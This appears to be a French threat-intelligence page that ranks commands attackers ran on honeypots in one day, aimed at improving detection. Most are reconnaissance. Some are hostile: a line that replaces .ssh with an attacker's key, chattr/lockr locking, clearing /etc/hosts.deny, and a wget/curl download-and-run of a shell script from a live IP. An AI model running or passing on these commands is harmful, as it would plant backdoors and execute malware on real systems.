Commandes Executees

Analyse en temps reel des commandes les plus executees par les attaquants apres avoir obtenu l'acces au systeme. Donnees collectees depuis notre reseau mondial de honeypots au cours des dernieres 24 heures.

8752 commandes en 24h

Top Commandes Executees

$Enter new UNIX password:

240 IPs582x

$uname -s -v -n -m 2 > /dev/null

162 IPs562x

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc || grep -c "^processor" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version

154 IPs514x

$lockr -ia .ssh

296 IPs394x

$cd ~; chattr -ia .ssh; lockr -ia .ssh

258 IPs331x

$uname -a

252 IPs322x

$cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

258 IPs321x

cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

254 IPs319x

$cat /proc/uptime 2 > /dev/null | cut -d. -f1

61 IPs318x

10.

$cat /proc/cpuinfo | grep name | wc -l

256 IPs318x

11.

$uname

247 IPs314x

12.

$uname -m

242 IPs314x

13.

$free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

244 IPs312x

14.

$whoami

246 IPs311x

15.

$w

246 IPs309x

16.

$crontab -l

241 IPs308x

17.

$lscpu | grep Model

240 IPs304x

18.

$top

242 IPs303x

19.

$cat /proc/cpuinfo | grep model | grep name | wc -l

239 IPs302x

20.

$which ls

238 IPs292x

21.

$df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

234 IPs287x

22.

$ls -lh $(which ls)

228 IPs275x

23.

$uname -m 2 > /dev/null

59 IPs168x

24.

rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

64 IPs66x

25.

$/bin/./uname -s -v -n -r -m

16 IPs45x

26.

$uname -s -v -n -r -m

12 IPs27x

27.

cd /data/local/tmp/; wget http://140.233.190.82/cat.sh || curl http://140.233.190.82/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android

4 IPs17x

28.

$then

6 IPs16x

29.

$if [ [ ! -d ${HOME}/.ssh ] ]

6 IPs16x

30.

$nproc

6 IPs14x

Reconnaissance

Commandes pour collecter des informations systeme (uname, whoami, cat /etc/passwd)

Telechargement

Commandes pour telecharger des malwares (wget, curl, tftp)

Persistance

Commandes pour maintenir l'acces (crontab, chmod, chattr)

Mouvement Lateral

Commandes pour se propager dans le reseau (ssh, scp, ping)

A propos de ces donnees

Ces commandes sont capturees en temps reel lorsque les attaquants obtiennent acces a nos honeypots. Elles representent les techniques reelles utilisees dans les attaques automatisees et manuelles. Utilisez ces informations pour ameliorer votre detection des menaces et votre reponse aux incidents.